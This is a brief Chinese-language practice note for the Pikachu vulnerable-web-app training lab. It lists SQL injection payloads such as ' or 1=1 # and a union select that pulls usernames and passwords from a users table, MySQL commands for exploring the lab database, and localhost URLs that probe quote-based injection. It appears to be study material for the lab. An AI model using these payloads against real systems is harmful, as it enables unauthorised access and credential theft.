在Pikachu靶场里查询
xx' or 1=1 #
' or 1=1 #
' union select username,password from users#
在 MySQL 的 bin 路径下打开 cmd ,输入下面的命令,再输入 数据库的密码
mysql -u root -p
执行命令
show databases;
use pikachu
show tables;
desc member;
select id,username,email from member;
select id,email from member where username ='xx' or 1=1;
select id,username,email from member limit 2,2;
show tables;
select * from users;
select id,email from member union select username,password from users;
单引号查询
http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=vince%27&submit=%E6%9F%A5%E8%AF%A2
双引号查询
http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=vince%22&submit=%E6%9F%A5%E8%AF%A2